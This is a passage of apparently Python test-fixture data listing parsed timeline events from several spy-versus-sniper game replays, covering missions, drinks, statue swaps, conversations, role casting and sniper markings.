ActionTest.NoAT,
),
(
"spy",
"00:47.8",
"action triggered: bug ambassador",
(None,),
(00 * 60 + 47.8),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"00:47.8",
"begin planting bug while standing.",
(Characters.Morgan,),
(00 * 60 + 47.8),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.NoCategory,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"00:46.1",
"bugged ambassador while standing.",
(Characters.Morgan,),
(00 * 60 + 46.1),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.MissionComplete,
Missions.Bug,
ActionTest.NoAT,
),
(
"game",
"00:46.1",
"missions completed. 10 second countdown.",
(None,),
(00 * 60 + 46.1),
None,
(None,),
(None,),
TimelineCategory.MissionCountdown,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:44.5",
"ambassador's personal space violated.",
(Characters.Morgan, Characters.Taft),
(00 * 60 + 44.5),
None,
(Roles.Ambassador, Roles.Spy),
(None,),
TimelineCategory.NoCategory,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:43.7",
"missions reset.",
(None,),
(00 * 60 + 43.7),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:41.1",
"spy leaves conversation.",
(None,),
(00 * 60 + 41.1),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:39.3",
"spy enters conversation.",
(None,),
(00 * 60 + 39.3),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:39.3",
"spy joined conversation with double agent.",
(Characters.Salmon,),
(00 * 60 + 39.3),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:35.1",
"waiter offered drink.",
(Characters.Taft,),
(00 * 60 + 35.1),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:32.1",
"ambassador's personal space violated.",
(Characters.Morgan, Characters.Taft),
(00 * 60 + 32.1),
None,
(Roles.Ambassador, Roles.Spy),
(None,),
TimelineCategory.NoCategory,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:30.8",
"spy leaves conversation.",
(None,),
(00 * 60 + 30.8),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:30.8",
"spy left conversation with double agent.",
(Characters.Salmon,),
(00 * 60 + 30.8),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:30.8",
"rejected drink from waiter.",
(Characters.Taft,),
(00 * 60 + 30.8),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:30.8",
"waiter stopped offering drink.",
(Characters.Taft,),
(00 * 60 + 30.8),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:24.7",
"45 seconds added to match.",
(None,),
(00 * 60 + 24.7),
None,
(None,),
(None,),
TimelineCategory.TimeAdd,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:09.5",
"45 seconds added to match.",
(None,),
(1 * 60 + 09.5),
None,
(None,),
(None,),
TimelineCategory.TimeAdd,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:54.4",
"45 seconds added to match.",
(None,),
(1 * 60 + 54.4),
None,
(None,),
(None,),
TimelineCategory.TimeAdd,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:39.2",
"45 seconds added to match.",
(None,),
(2 * 60 + 39.2),
None,
(None,),
(None,),
TimelineCategory.TimeAdd,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:54.5",
"waiter offered drink.",
(Characters.Taft,),
(2 * 60 + 54.5),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:51.8",
"picked up statue.",
(None,),
(2 * 60 + 51.8),
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:49.1",
"rejected drink from waiter.",
(Characters.Taft,),
(2 * 60 + 49.1),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:49.1",
"picked up fingerprintable statue (difficult).",
(None,),
(2 * 60 + 49.1),
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"02:49.1",
"waiter stopped offering drink.",
(Characters.Taft,),
(2 * 60 + 49.1),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:47.6",
"action triggered: fingerprint ambassador",
(None,),
(2 * 60 + 47.6),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"02:47.6",
"started fingerprinting statue.",
(None,),
(2 * 60 + 47.6),
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"02:46.6",
"action test green: fingerprint ambassador",
(None,),
(2 * 60 + 46.6),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Fingerprint,
ActionTest.Green,
),
(
"spy",
"02:45.6",
"fingerprinted statue.",
(None,),
(2 * 60 + 45.6),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.MissionPartial,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"02:43.0",
"put back statue.",
(None,),
(2 * 60 + 43.0),
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.NoMission,
ActionTest.NoAT,
),
],
),
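# Game -5381334556900546672: a pending statue swap completed when a civilian picks up the statue, plus two aborted purloins before a green-test purloin goes pending.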
(
"-5381334556900546672",
[
(
"spy",
"01:01.3",
"action test green: swap statue",
(None,),
(1 * 60 + 01.3),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTest,
Missions.Swap,
ActionTest.Green,
),
(
"spy",
"01:01.3",
"statue swap pending.",
(None,),
(1 * 60 + 01.3),
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.Swap,
ActionTest.NoAT,
),
(
"spy",
"00:58.5",
"put back statue.",
(None,),
(00 * 60 + 58.5),
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:51.8",
"spy enters conversation.",
(None,),
(00 * 60 + 51.8),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:51.1",
"request drink from waiter.",
(Characters.Taft,),
(00 * 60 + 51.1),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:49.5",
"waiter offered drink.",
(Characters.Taft,),
(00 * 60 + 49.5),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:48.2",
"action triggered: purloin guest list",
(None,),
(00 * 60 + 48.2),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"00:47.5",
"action test white: purloin guest list",
(None,),
(00 * 60 + 47.5),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Purloin,
ActionTest.White,
),
(
"spy",
"00:46.5",
"spy leaves conversation.",
(None,),
(00 * 60 + 46.5),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:46.5",
"purloin guest list aborted.",
(None,),
(00 * 60 + 46.5),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"00:46.5",
"waiter stopped offering drink.",
(Characters.Taft,),
(00 * 60 + 46.5),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:46.2",
"spy enters conversation.",
(None,),
(00 * 60 + 46.2),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:45.6",
"waiter gave up.",
(Characters.Taft,),
(00 * 60 + 45.6),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:45.0",
"request drink from waiter.",
(Characters.Taft,),
(00 * 60 + 45.0),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:44.7",
"waiter offered drink.",
(Characters.Taft,),
(00 * 60 + 44.7),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:44.3",
"character picked up pending statue.",
(Characters.Irish,),
(00 * 60 + 44.3),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Statues,
Missions.Swap,
ActionTest.NoAT,
),
(
"spy",
"00:43.5",
"action triggered: purloin guest list",
(None,),
(00 * 60 + 43.5),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"00:42.1",
"action test white: purloin guest list",
(None,),
(00 * 60 + 42.1),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Purloin,
ActionTest.White,
),
(
"spy",
"00:41.3",
"spy leaves conversation.",
(None,),
(00 * 60 + 41.3),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:41.3",
"purloin guest list aborted.",
(None,),
(00 * 60 + 41.3),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"00:41.3",
"waiter stopped offering drink.",
(Characters.Taft,),
(00 * 60 + 41.3),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:41.1",
"spy enters conversation.",
(None,),
(00 * 60 + 41.1),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:40.5",
"waiter gave up.",
(Characters.Taft,),
(00 * 60 + 40.5),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:40.1",
"request drink from waiter.",
(Characters.Taft,),
(00 * 60 + 40.1),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:40.0",
"waiter offered drink.",
(Characters.Taft,),
(00 * 60 + 40.0),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:40.0",
"statue swapped.",
(Characters.Irish,),
(00 * 60 + 40.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Statues | TimelineCategory.MissionComplete,
Missions.Swap,
ActionTest.NoAT,
),
(
"spy",
"00:38.8",
"action triggered: purloin guest list",
(None,),
(00 * 60 + 38.8),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"00:37.5",
"action test green: purloin guest list",
(None,),
(00 * 60 + 37.5),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Purloin,
ActionTest.Green,
),
(
"spy",
"00:37.5",
"guest list purloin pending.",
(Characters.Taft,),
(00 * 60 + 37.5),
None,
(Roles.Spy,),
(None,),
TimelineCategory.NoCategory,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"00:37.5",
"rejected drink from waiter.",
(Characters.Taft,),
(00 * 60 + 37.5),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
],
),
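# Game -6996172267372142000: purloin and seduce both complete, ending with the missions-completed countdown and a successful game end.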
(
"-6996172267372142000",
[
(
"spy",
"02:16.6",
"flirt with seduction target: 51%",
(Characters.Oprah,),
(2 * 60 + 16.6),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionPartial,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"02:15.0",
"stopped talking.",
(None,),
(2 * 60 + 15.0),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:51.7",
"request drink from waiter.",
(Characters.Alice,),
(1 * 60 + 51.7),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:47.0",
"waiter offered drink.",
(Characters.Alice,),
(1 * 60 + 47.0),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:43.3",
"action triggered: purloin guest list",
(None,),
(1 * 60 + 43.3),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"01:42.3",
"action test white: purloin guest list",
(None,),
(1 * 60 + 42.3),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Purloin,
ActionTest.White,
),
(
"spy",
"01:40.6",
"got drink from waiter.",
(Characters.Alice,),
(1 * 60 + 40.6),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:40.6",
"guest list purloined.",
(Characters.Alice,),
(1 * 60 + 40.6),
None,
(Roles.Spy,),
(None,),
TimelineCategory.MissionComplete,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"01:40.6",
"waiter stopped offering drink.",
(Characters.Alice,),
(1 * 60 + 40.6),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:35.9",
"marked neutral suspicion.",
(Characters.Carlos,),
(1 * 60 + 35.9),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:35.5",
"marked suspicious.",
(Characters.Helen,),
(1 * 60 + 35.5),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:34.8",
"sipped drink.",
(Characters.Alice,),
(1 * 60 + 34.8),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:34.7",
"marked less suspicious.",
(Characters.Salmon,),
(1 * 60 + 34.7),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:33.8",
"marked suspicious.",
(Characters.General,),
(1 * 60 + 33.8),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:32.5",
"marked less suspicious.",
(Characters.Irish,),
(1 * 60 + 32.5),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:32.2",
"marked less suspicious.",
(Characters.Boots,),
(1 * 60 + 32.2),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:31.9",
"marked less suspicious.",
(Characters.Disney,),
(1 * 60 + 31.9),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:31.6",
"flirtation cooldown expired.",
(None,),
(1 * 60 + 31.6),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"sniper",
"01:31.3",
"marked less suspicious.",
(Characters.Queen,),
(1 * 60 + 31.3),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:30.8",
"marked less suspicious.",
(Characters.Morgan,),
(1 * 60 + 30.8),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:30.2",
"marked neutral suspicion.",
(Characters.Queen,),
(1 * 60 + 30.2),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:30.0",
"marked neutral suspicion.",
(Characters.Morgan,),
(1 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:30.0",
"action triggered: seduce target",
(None,),
(1 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"01:30.0",
"begin flirtation with seduction target.",
(Characters.Oprah,),
(1 * 60 + 30.0),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"sniper",
"01:29.0",
"marked less suspicious.",
(Characters.Morgan,),
(1 * 60 + 29.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:28.8",
"action test green: seduce target",
(None,),
(1 * 60 + 28.8),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Seduce,
ActionTest.Green,
),
(
"spy",
"01:28.8",
"flirt with seduction target: 100%",
(Characters.Oprah,),
(1 * 60 + 28.8),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionPartial,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"01:28.8",
"target seduced.",
(Characters.Oprah,),
(1 * 60 + 28.8),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionComplete,
Missions.Seduce,
ActionTest.NoAT,
),
(
"game",
"01:28.8",
"missions completed. 10 second countdown.",
(None,),
(1 * 60 + 28.8),
None,
(None,),
(None,),
TimelineCategory.MissionCountdown,
Missions.NoMission,
ActionTest.NoAT,
),
(
"game",
"01:18.8",
"missions completed successfully.",
(None,),
(1 * 60 + 18.8),
None,
(None,),
(None,),
TimelineCategory.GameEnd,
Missions.NoMission,
ActionTest.NoAT,
),
],
),
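# Game -4284672900785851911: setup-only slice at 03:00.0 — role casts, mission selections, and mission enables.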
(
"-4284672900785851911",
[
(
"spy",
"03:00.0",
"spy cast.",
(Characters.Queen,),
(3 * 60 + 00.0),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"ambassador cast.",
(Characters.Carlos,),
(3 * 60 + 00.0),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"double agent cast.",
(Characters.Bling,),
(3 * 60 + 00.0),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"suspected double agent cast.",
(Characters.Plain,),
(3 * 60 + 00.0),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"seduction target cast.",
(Characters.Wheels,),
(3 * 60 + 00.0),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"civilian cast.",
(Characters.Oprah,),
(3 * 60 + 00.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"civilian cast.",
(Characters.Boots,),
(3 * 60 + 00.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"civilian cast.",
(Characters.Smallman,),
(3 * 60 + 00.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"civilian cast.",
(Characters.Sari,),
(3 * 60 + 00.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"civilian cast.",
(Characters.Taft,),
(3 * 60 + 00.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"civilian cast.",
(Characters.Morgan,),
(3 * 60 + 00.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"civilian cast.",
(Characters.Helen,),
(3 * 60 + 00.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"civilian cast.",
(Characters.General,),
(3 * 60 + 00.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"civilian cast.",
(Characters.Salmon,),
(3 * 60 + 00.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"civilian cast.",
(Characters.Alice,),
(3 * 60 + 00.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"civilian cast.",
(Characters.Sikh,),
(3 * 60 + 00.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"bug ambassador selected.",
(None,),
(3 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"contact double agent selected.",
(None,),
(3 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"swap statue selected.",
(None,),
(3 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Swap,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"inspect 2 statues selected.",
(None,),
(3 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"seduce target selected.",
(None,),
(3 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"purloin guest list selected.",
(None,),
(3 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"fingerprint ambassador selected.",
(None,),
(3 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"bug ambassador enabled.",
(None,),
(3 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"contact double agent enabled.",
(None,),
(3 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"swap statue enabled.",
(None,),
(3 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Swap,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"inspect 2 statues enabled.",
(None,),
(3 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"seduce target enabled.",
(None,),
(3 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"purloin guest list enabled.",
(None,),
(3 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"03:00.0",
"fingerprint ambassador enabled.",
(None,),
(3 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Fingerprint,
ActionTest.NoAT,
),
],
),
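# Game -3717661638173477014: game start, early sniper lights, a green-test 51% flirt, and a white-test double agent contact.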
(
"-3717661638173477014",
[
(
"game",
"03:00.0",
"game started.",
(None,),
(3 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.GameStart,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:58.3",
"spy player takes control from ai.",
(None,),
(2 * 60 + 58.3),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:58.3",
"spy leaves conversation.",
(None,),
(2 * 60 + 58.3),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:55.3",
"marked less suspicious.",
(Characters.Carlos,),
(2 * 60 + 55.3),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:53.5",
"spy enters conversation.",
(None,),
(2 * 60 + 53.5),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:53.5",
"marked less suspicious.",
(Characters.Bling,),
(2 * 60 + 53.5),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:52.8",
"action triggered: seduce target",
(None,),
(2 * 60 + 52.8),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"02:52.8",
"begin flirtation with seduction target.",
(Characters.Wheels,),
(2 * 60 + 52.8),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"02:51.4",
"action test green: seduce target",
(None,),
(2 * 60 + 51.4),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Seduce,
ActionTest.Green,
),
(
"spy",
"02:51.4",
"flirt with seduction target: 51%",
(Characters.Wheels,),
(2 * 60 + 51.4),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionPartial,
Missions.Seduce,
ActionTest.NoAT,
),
(
"sniper",
"02:39.1",
"marked less suspicious.",
(Characters.Sikh,),
(2 * 60 + 39.1),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:37.8",
"spy leaves conversation.",
(None,),
(2 * 60 + 37.8),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:37.1",
"marked suspicious.",
(Characters.General,),
(2 * 60 + 37.1),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:34.1",
"spy enters conversation.",
(None,),
(2 * 60 + 34.1),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:34.1",
"spy joined conversation with double agent.",
(Characters.Bling,),
(2 * 60 + 34.1),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:30.4",
"took last sip of drink.",
(Characters.Queen,),
(2 * 60 + 30.4),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:29.8",
"flirtation cooldown expired.",
(None,),
(2 * 60 + 29.8),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"sniper",
"02:27.3",
"marked less suspicious.",
(Characters.Alice,),
(2 * 60 + 27.3),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:18.2",
"action triggered: contact double agent",
(None,),
(2 * 60 + 18.2),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"02:18.2",
"real banana bread started.",
(None,),
(2 * 60 + 18.2),
None,
(None,),
(None,),
TimelineCategory.BananaBread,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"02:17.1",
"action test white: contact double agent",
(None,),
(2 * 60 + 17.1),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Contact,
ActionTest.White,
),
(
"spy",
"02:16.2",
